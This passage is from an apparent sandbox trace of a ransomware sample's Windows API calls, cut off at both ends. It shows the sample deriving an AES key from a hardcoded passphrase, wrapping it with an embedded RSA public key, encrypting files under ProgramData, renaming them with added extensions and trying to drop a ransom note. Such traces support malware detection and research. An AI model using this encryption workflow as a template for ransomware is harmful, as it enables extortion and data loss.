lpOverlapped=0x0) returned 0 [0236.576] ReadFile (in: hFile=0xffffffff, lpBuffer=0x279cfa0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d93c, lpOverlapped=0x0 | out: lpBuffer=0x279cfa0, lpNumberOfBytesRead=0x2b9d93c*=0x0, lpOverlapped=0x0) returned 0 [0236.576] CryptEncrypt (in: hKey=0x28173d8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x279cfa0*, pdwDataLen=0x2b9d93c*=0x0, dwBufLen=0x400 | out: pbData=0x279cfa0*, pdwDataLen=0x2b9d93c*=0x10) returned 1 [0236.576] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279cfa0, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0236.576] CloseHandle (hObject=0xffffffff) returned 1 [0236.576] CloseHandle (hObject=0xffffffff) returned 1 [0236.576] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png.gsg" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png"), bFailIfExists=0) returned 0 [0236.576] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png", dwFileAttributes=0x0) returned 0 [0236.577] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png.gsg" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png.gsg")) returned 0 [0236.577] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png.fuck" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png.fuck")) returned 0 [0236.577] CryptDestroyHash (hHash=0x2817398) returned 1 [0236.577] CryptDestroyKey (hKey=0x28173d8) returned 1 [0236.577] CryptReleaseContext (hProv=0x2816b18, dwFlags=0x0) returned 1 [0236.578] FindNextFileA (in: hFindFile=0x2817298, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0236.578] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e938 | out: lpSystemTimeAsFileTime=0x2b9e938) [0236.578] GetLastError () returned 0x5 [0236.578] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml")) returned 0x20 [0236.578] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml", dwFileAttributes=0x80) returned 0 [0236.578] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.579] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml.gsg" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.579] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml.gsg", dwFileAttributes=0x2) returned 0 [0236.579] CryptAcquireContextA (in: phProv=0x2b9d934, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d934*=0x2816b18) returned 1 [0236.587] CryptCreateHash (in: hProv=0x2816b18, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d938 | out: phHash=0x2b9d938) returned 1 [0236.587] lstrlenA (lpString="ZiEnGWXxVFRxNONCYhHbvsvTzMlQm") returned 29 [0236.587] CryptHashData (hHash=0x2816d58, pbData=0x2ecb48, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0236.587] CryptDeriveKey (in: hProv=0x2816b18, Algid=0x6610, hBaseData=0x2816d58, dwFlags=0x1000000, phKey=0x2b9d924 | out: phKey=0x2b9d924*=0x2817098) returned 1 [0236.587] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0236.587] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d940, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c | out: pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c) returned 1 [0236.587] CryptAcquireContextA (in: phProv=0x2b9d930, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d930*=0x2816188) returned 1 [0236.588] CryptImportPublicKeyInfo (in: hCryptProv=0x2816188, dwCertEncodingType=0x1, pInfo=0x2809400*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2809430*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2809438*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d928 | out: phKey=0x2b9d928*=0x2816e58) returned 1 [0236.588] CryptEncrypt (in: hKey=0x2816e58, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d918*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d918*=0x80) returned 1 [0236.589] CryptEncrypt (in: hKey=0x2816e58, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28168f8*, pdwDataLen=0x2b9d92c*=0x18, dwBufLen=0x80 | out: pbData=0x28168f8*, pdwDataLen=0x2b9d92c*=0x80) returned 1 [0236.590] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28168f8, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0236.590] ReadFile (in: hFile=0xffffffff, lpBuffer=0x279cfa0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d93c, lpOverlapped=0x0 | out: lpBuffer=0x279cfa0, lpNumberOfBytesRead=0x2b9d93c*=0x0, lpOverlapped=0x0) returned 0 [0236.590] CryptEncrypt (in: hKey=0x2817098, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x279cfa0*, pdwDataLen=0x2b9d93c*=0x0, dwBufLen=0x400 | out: pbData=0x279cfa0*, pdwDataLen=0x2b9d93c*=0x10) returned 1 [0236.590] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279cfa0, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0236.590] CloseHandle (hObject=0xffffffff) returned 1 [0236.590] CloseHandle (hObject=0xffffffff) returned 1 [0236.590] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml.gsg" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml"), bFailIfExists=0) returned 0 [0236.591] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml", dwFileAttributes=0x0) returned 0 [0236.591] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml.gsg" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml.gsg")) returned 0 [0236.591] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml.fuck" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml.fuck")) returned 0 [0236.592] CryptDestroyHash (hHash=0x2816d58) returned 1 [0236.592] CryptDestroyKey (hKey=0x2817098) returned 1 [0236.592] CryptReleaseContext (hProv=0x2816b18, dwFlags=0x0) returned 1 [0236.592] FindNextFileA (in: hFindFile=0x2817298, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0236.592] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e938 | out: lpSystemTimeAsFileTime=0x2b9e938) [0236.592] GetLastError () returned 0x5 [0236.592] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png")) returned 0x20 [0236.592] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png", dwFileAttributes=0x80) returned 0 [0236.592] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.593] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png.gsg" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.593] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png.gsg", dwFileAttributes=0x2) returned 0 [0236.593] CryptAcquireContextA (in: phProv=0x2b9d934, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d934*=0x2816980) returned 1 [0236.598] CryptCreateHash (in: hProv=0x2816980, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d938 | out: phHash=0x2b9d938) returned 1 [0236.598] lstrlenA (lpString="ZiEnGWXxVFRxNONCYhHbvsvTzMlQm") returned 29 [0236.598] CryptHashData (hHash=0x2817398, pbData=0x2ecb48, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0236.598] CryptDeriveKey (in: hProv=0x2816980, Algid=0x6610, hBaseData=0x2817398, dwFlags=0x1000000, phKey=0x2b9d924 | out: phKey=0x2b9d924*=0x2816e98) returned 1 [0236.598] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0236.598] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d940, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c | out: pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c) returned 1 [0236.598] CryptAcquireContextA (in: phProv=0x2b9d930, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d930*=0x2816a08) returned 1 [0236.600] CryptImportPublicKeyInfo (in: hCryptProv=0x2816a08, dwCertEncodingType=0x1, pInfo=0x2809740*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2809770*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2809778*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d928 | out: phKey=0x2b9d928*=0x2816f18) returned 1 [0236.600] CryptEncrypt (in: hKey=0x2816f18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d918*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d918*=0x80) returned 1 [0236.600] CryptEncrypt (in: hKey=0x2816f18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2816b18*, pdwDataLen=0x2b9d92c*=0x18, dwBufLen=0x80 | out: pbData=0x2816b18*, pdwDataLen=0x2b9d92c*=0x80) returned 1 [0236.600] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2816b18, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0236.600] ReadFile (in: hFile=0xffffffff, lpBuffer=0x279cfa0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d93c, lpOverlapped=0x0 | out: lpBuffer=0x279cfa0, lpNumberOfBytesRead=0x2b9d93c*=0x0, lpOverlapped=0x0) returned 0 [0236.600] CryptEncrypt (in: hKey=0x2816e98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x279cfa0*, pdwDataLen=0x2b9d93c*=0x0, dwBufLen=0x400 | out: pbData=0x279cfa0*, pdwDataLen=0x2b9d93c*=0x10) returned 1 [0236.600] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279cfa0, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0236.600] CloseHandle (hObject=0xffffffff) returned 1 [0236.600] CloseHandle (hObject=0xffffffff) returned 1 [0236.600] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png.gsg" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png"), bFailIfExists=0) returned 0 [0236.601] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png", dwFileAttributes=0x0) returned 0 [0236.601] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png.gsg" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png.gsg")) returned 0 [0236.601] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png.fuck" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png.fuck")) returned 0 [0236.602] CryptDestroyHash (hHash=0x2817398) returned 1 [0236.602] CryptDestroyKey (hKey=0x2816e98) returned 1 [0236.602] CryptReleaseContext (hProv=0x2816980, dwFlags=0x0) returned 1 [0236.602] FindNextFileA (in: hFindFile=0x2817298, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0 [0236.602] FindClose (in: hFindFile=0x2817298 | out: hFindFile=0x2817298) returned 1 [0236.602] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\readme_back_files.htm")) returned 0xffffffff [0236.602] AreFileApisANSI () returned 1 [0236.602] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2c10, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 107 [0236.602] CreateFileW (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ebac, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.603] GetLastError () returned 0x5 [0236.603] GetLastError () returned 0x5 [0236.603] FindNextFileA (in: hFindFile=0x2817198, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0 [0236.603] FindClose (in: hFindFile=0x2817198 | out: hFindFile=0x2817198) returned 1 [0236.603] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Device\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\readme_back_files.htm")) returned 0xffffffff [0236.603] AreFileApisANSI () returned 1 [0236.603] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2f6e20, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 68 [0236.603] CreateFileW (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Device\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ef48, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.604] GetLastError () returned 0x5 [0236.604] GetLastError () returned 0x5 [0236.604] FindNextFileA (in: hFindFile=0x2817458, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0236.604] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\*.*", lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0x2816f58 [0236.605] FindNextFileA (in: hFindFile=0x2816f58, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0236.605] FindNextFileA (in: hFindFile=0x2816f58, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0236.605] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\*.*", lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0x2816d58 [0236.606] FindNextFileA (in: hFindFile=0x2816d58, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0236.606] FindNextFileA (in: hFindFile=0x2816d58, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0236.607] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\*.*", lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0x2816fd8 [0236.607] FindNextFileA (in: hFindFile=0x2816fd8, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0236.607] FindNextFileA (in: hFindFile=0x2816fd8, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0236.607] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e59c | out: lpSystemTimeAsFileTime=0x2b9e59c) [0236.607] GetLastError () returned 0x5 [0236.607] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\resource.xml" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-us\\resource.xml")) returned 0x20 [0236.607] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\resource.xml", dwFileAttributes=0x80) returned 0 [0236.608] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\resource.xml" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-us\\resource.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.608] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\resource.xml.gsg" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-us\\resource.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.608] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\resource.xml.gsg", dwFileAttributes=0x2) returned 0 [0236.608] CryptAcquireContextA (in: phProv=0x2b9d598, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d598*=0x2816980) returned 1 [0236.614] CryptCreateHash (in: hProv=0x2816980, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d59c | out: phHash=0x2b9d59c) returned 1 [0236.614] lstrlenA (lpString="ZiEnGWXxVFRxNONCYhHbvsvTzMlQm") returned 29 [0236.614] CryptHashData (hHash=0x2816e98, pbData=0x2ecb70, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0236.614] CryptDeriveKey (in: hProv=0x2816980, Algid=0x6610, hBaseData=0x2816e98, dwFlags=0x1000000, phKey=0x2b9d588 | out: phKey=0x2b9d588*=0x2817058) returned 1 [0236.614] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0236.614] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d5a4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580 | out: pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580) returned 1 [0236.614] CryptAcquireContextA (in: phProv=0x2b9d594, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d594*=0x2814f78) returned 1 [0236.615] CryptImportPublicKeyInfo (in: hCryptProv=0x2814f78, dwCertEncodingType=0x1, pInfo=0x2809260*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2809290*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2809298*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d58c | out: phKey=0x2b9d58c*=0x2817398) returned 1 [0236.615] CryptEncrypt (in: hKey=0x2817398, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d57c*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d57c*=0x80) returned 1 [0236.615] CryptEncrypt (in: hKey=0x2817398, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2815550*, pdwDataLen=0x2b9d590*=0x18, dwBufLen=0x80 | out: pbData=0x2815550*, pdwDataLen=0x2b9d590*=0x80) returned 1 [0236.615] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2815550, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0236.615] ReadFile (in: hFile=0xffffffff, lpBuffer=0x279cfa0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x279cfa0, lpNumberOfBytesRead=0x2b9d5a0*=0x0, lpOverlapped=0x0) returned 0 [0236.616] CryptEncrypt (in: hKey=0x2817058, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x279cfa0*, 